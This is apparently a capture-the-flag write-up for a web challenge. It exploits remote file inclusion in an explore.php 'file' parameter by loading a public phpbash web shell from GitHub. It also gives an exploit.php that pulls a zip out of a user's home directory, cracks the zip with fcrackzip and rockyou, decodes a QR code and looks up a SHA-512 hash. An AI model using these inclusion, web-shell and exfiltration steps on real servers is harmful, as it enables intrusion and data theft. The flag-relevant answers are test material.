# [Challenge 0x0e](https://www.youtube.com/watch?v=7dIroYNITIc)

In this challenge we get a website that seems pretty normal at first.  
We can see the startpage that just says the page is currently being built, an impressum that unfortunately removes the navigation bar,
and a guestbook *with input fields*.  
Now at first glance the guestbook seems like a nice entrypoint for xss or sqli maybe, however when why try to submit anything it breaks.  
You could look into this further, but unfortunately this is just a fake route so we will no longer follow it.  
However, if you didnt notice it yet, the page you land on when you error + the error message about a `missing file parameter` might give you a good hint on what kind of exploit is possible on this machine.  
The guestbooks submit button points you to `/explore.php?firstname=xxx&lastname=yyy&country=zzz&subject=1234`.  
If you now go back to the main site and just click on any link other than startpage, you will see that we also go to `/explore.php`, but this time with a valid `file` get parameter.  
The guestbook for example points to `guest.php`.  
My first approach was to try to point it to arbitrary files within the system to be able to read them. Unfortunately, this doesnt work as the file extension is checked to be `.php`.  
However, you might try it out of curiosity or notice it in the impressum: you dont need to specify a php file on the machine, you can use one on any webserver.  
This is pretty cool, we can remotely execute any php we want!  
Since i didnt find a php reverse shell (and dont know how to write one myself) i used a series of .php files to execute commands like ls for me, to get an overview of the files on the server.  
The script to download the `.zip` file we are looking for is the `exploit.php`, however it is much easier to use a php reverse shell.  
This is the exploit.php:
```php
<?php
$file = '/home/user/secret.zip';

if (file_exists($file)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}
?>
```
As an example, you can use `https://raw.githubusercontent.com/Arrexel/phpbash/master/phpbash.php` as the path for your php file, this is not the only shell that works but one that does.  

So now you have a shell and you start in `/var/www/html/`, however from the challenge description you also know that `We were able to find a file in one of the users home directory.`.  
So lets go to `/home/user/` and we find a file called `secret.zip`.  
There are multiple ways to download this file, one is using the exploit.php now that you found the path with the shell. Another way is by copying the secret.zip to the `/var/www/html/` directory, and simply going to `/secret.zip` in your browser (instead of `/exploit.php`) to download the file.  
If you do this, to make the challenge more fun to others please remove it from the `/var/www/html` directory again, so it wont be found by a simple dirb or trying around for example :)  

By the way, there is a special challenge hidden in this challenge aswell, but i will leave it up to you to find and solve it ;)  

Now that we have the secret.zip on our machine, we will unzip it.  
It has a password on it, but we already know how to crack those so we just use `fcrackzip` to do so:  
`fcrackzip secret.zip -D -p /usr/share/wordlists/rockyou.txt -u`  
It will return that the password is `sunshine`.  

Now the fun part begins. We get a text file called `input_binary_or_not.txt` which is a seemingly arbitrary string of 0s and 1s.  
At this point it is time to experiment arond A LOT. I could not make any sense out of this string in binary or any other common encoding i tried, it didnt seem like encrypted binary data.  
So after a while of trying around you might thing that this is some kind of ascii art, or maybe a picture with two colors.  
We just assume for now the 0s are representing BLACK and 1s are representing WHITE.  
However, a oneliner does not really make sense as a picture.  
A good guess here is that the picture *might* be a square. Lets split the line evenly so that we get the same amount of lines, as we have characters per line.  
For that we will use a python script:  

```py
import math

# get our input string
with open('input_binary_or_not.txt', 'r') as fp:
    inp = fp.readline().strip()

# calculate how many lines we want / how long our lines should be
line_len = int(math.sqrt(len(inp)))
# split the input string by line length
lines = [inp[(i - 1) * line_len:i * line_len] for i in range(line_len)]

# join the lines with linebreaks inbetween them
outp = '\n'.join(lines)

# replace 0s with three spaces, and 1s with three 8s for better readability!
outp = outp.replace('0', '   ').replace('1', '888')
with open('square.txt', 'w') as fp:
    fp.write(outp)
```

This will write our "image" to a text file called `square.txt`.  
Now i have seen people use `pil` to create an actual image out of this, however i dont know how to use PIL so i just used this.  

Once we got our square.txt i open it with a text editor and set the font size to 1, and tadaa, we get a QR Code!
You might need to put some editing efforts into enhancing the image, but you should end up with something like this:  

![qr-code](qr.png "qr-code")

If we scan this code we get the following text: `a336f671080fbf4f2a230f313560ddf0d0c12dfcf1741e49e8722a234673037dc493caa8d291d8025f71089d63cea809cc8ae53e5b17054806837dbe4099c4ca=sha512(text)`

If we can now crack this either via hashcat, or just looking the hash up on a site like md5hashing.net.  
The resulting string is `mypassword`.

This is everything we need to create our flag.  